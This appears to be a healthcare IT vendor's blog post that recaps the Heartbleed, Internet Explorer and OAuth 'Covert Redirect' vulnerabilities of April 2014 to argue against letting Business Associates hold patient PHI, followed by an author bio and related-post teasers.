Three weeks ago Internet users were notified en masse that a security vulnerability had been discovered in OpenSSL, a widely-used piece of open-source software that helps securely transport information around the web. The so-called Heartbleed bug forced healthcare IT vendors across the industry to perform internal forensic analyses to check whether they were sending vulnerable PHI across various internal and external networks.
Just one week later Microsoft announced that it had discovered a serious security vulnerability in its Internet Explorer browser. The issue was so severe that it prompted the federal government to tell citizens to use another browser until the flaw had been corrected. Once again, health IT vendors had to perform HIPAA-mandated security risk assessments to measure the severity and scope of the security incident.
Keeping the April security flaw theme going, just last week yet another vulnerability was discovered in a tool that many people use every day. The “Covert Redirect” vulnerability in OAuth, an open-source log-in tool used by such Internet titans as Facebook and Google, allows hackers to steal user data and gain access to secure websites. Again, vendors in the healthcare space with user-facing portals had to perform the same assessments to determine if their customer PHI had been compromised.
It was certainly an April to remember for health IT security professionals. Aside from countless hours of remediation and forensic efforts, these events should serve as a reminder of the risks associated with allowing a Business Associate to take custody of you patients’ PHI. Business Associate Agreements can be signed, and vendor assessments can be performed, but at the end of the day, you are placing yourself at the mercy of your provider’s security controls. And as the April security incidents have shown us, not even the vendors with the most
painstaking security checks will be 100% secure.Sometimes abstinence is the only means of prevention. Passing through the cloud avoids the Business Associate conundrum by never allowing your PHI to be stored or even passed through a vendor’s environment. How many assurance emails can you get from your IT vendors before it’s enough?
A lifelong communicator, this Tennessee native got his start in broadcast news before branching out into public media, corporate, communications, digital advertising, and integrated marketing. Prior to joining QliqSOFT as the company's first marketing team member, Ben shared his talents with organizations that include the University of Alabama, iHeartMedia, and The Kroger Company.
Engaging Patients and Connecting Care Teams Through Interactive Digital ConversationsLearn More
AllianceChicago, a national network of more than 70 community health centers (CHCs) across 19 states, today announced the publication of a quality improvement-focused article titled “CHEC-UP: A digital intervention to reduce disparities in well-child and immunization completion in community health” in Telehealth™ & Medicine Today. The project focus was made possible with the donation of QliqSOFT’s Quincy artificial intelligence (AI)-powered chatbots.
The journey of the specialty pharmacy patient is a complex and expensive process, as most any hub services participant knows. It starts when the patient is diagnosed with a life-changing chronic or complicated condition and the pharmacy receives the order for a specialty drug.
When thinking about a healthcare emergency preparedness plan, how much does compliance matter in your disaster communications? If your organization is in the throes of a power outage from heavy storms or a cyber attack that’s left your network down, thoughts of compliance may not be top of mind.